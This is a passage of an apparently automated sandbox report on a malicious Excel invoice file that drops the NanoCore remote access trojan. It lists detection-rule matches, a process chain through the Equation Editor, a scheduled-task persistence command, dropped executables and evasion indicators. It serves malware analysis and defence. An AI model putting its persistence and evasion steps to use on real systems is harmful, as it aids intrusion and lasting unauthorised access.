Source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.27d1644.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.27d1644.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.5c0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.5c0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: nano[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: gmSlQSien.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/29@15/2
Source: C:\Users\Public\vbc.exe Code function: 4_2_006D053E AdjustTokenPrivileges, 4_2_006D053E
Source: C:\Users\Public\vbc.exe Code function: 4_2_006D0507 AdjustTokenPrivileges, 4_2_006D0507
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_004F10DA AdjustTokenPrivileges, 7_2_004F10DA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_004F10A3 AdjustTokenPrivileges, 7_2_004F10A3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe File created: C:\Program Files (x86)\SMTP Service
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{f57d5a77-8670-45ef-b736-5f3a07b68725}
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\Public\vbc.exe Mutant created: \Sessions\1\BaseNamedObjects\NFKnYlgkNzhyGKSdXXNN
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE04.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ..................#.............h.#.....(.P.....h...............(...............................................................................
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx Virustotal: Detection: 29%
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx ReversingLabs: Detection: 22%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: unknown Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx Static file information: File size 2355200 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.pdbWindows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: ystem.pdb- source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: =T3UpC:\Windows\System.pdbA!`y source: RegSvcs.exe, 00000007.00000002.2395879525.0000000004FDC000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\RegSvcs.pdbN source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: ps.pdb source: RegSvcs.exe, 00000007.00000002.2394056812.00000000008BD000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: System.EnterpriseServices.Wrapper.pdb source: smtpsvc.exe, 00000008.00000002.2225121272.0000000001D90000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\System.pdb``[ source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000007.00000003.2194043943.00000000006E3000.00000004.00000001.sdmp, smtpsvc.exe, smtpsvc.exe.7.dr
Source: Binary string: indows\System.pdbpdbtem.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: vbc.exe, 00000004.00000002.2194187602.0000000000B10000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2394185585.0000000002130000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx Initial sample: OLE indicators vbamacros = False
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

.NET source code contains potential unpacker
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_011D6A9F push es; iretd 4_2_011D6B77
Source: C:\Users\Public\vbc.exe Code function: 4_2_011DA2BC push es; retf 4_2_011DA2FC
Source: C:\Users\Public\vbc.exe Code function: 4_2_011DA0AC push es; retf 4_2_011DA272
Source: C:\Users\Public\vbc.exe Code function: 4_2_011DA2FE push es; retf 4_2_011DA30E
Source: C:\Users\Public\vbc.exe Code function: 4_2_011DA274 push es; retf 4_2_011DA28A
Source: C:\Users\Public\vbc.exe Code function: 4_2_00146D35 push esp; retf 4_2_00146D36
Source: C:\Users\Public\vbc.exe Code function: 4_2_00147FF9 push esp; retf 4_2_00147FFA
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EC4B5 push CCFFFFFEh; ret 4_2_002EC4BA
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EC55D push edi; retf 4_2_002EC563
Source: C:\Users\Public\vbc.exe Code function: 4_2_002ECE17 push esp; retf 4_2_002ECE19
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_001A5E25 push esp; retf 7_2_001A5E26
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_001A9D62 push eax; retf 7_2_001A9D65
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_001A9D66 pushad ; retf 7_2_001A9D69
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_001A989B push ecx; retf 001Ah 7_2_001A98A1
Source: initial sample Static PE information: section name: .text entropy: 7.9540154939
Source: initial sample Static PE information: section name: .text entropy: 7.9540154939
Source: initial sample Static PE information: section name: .text entropy: 7.9540154939
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\gmSlQSien.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe File created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
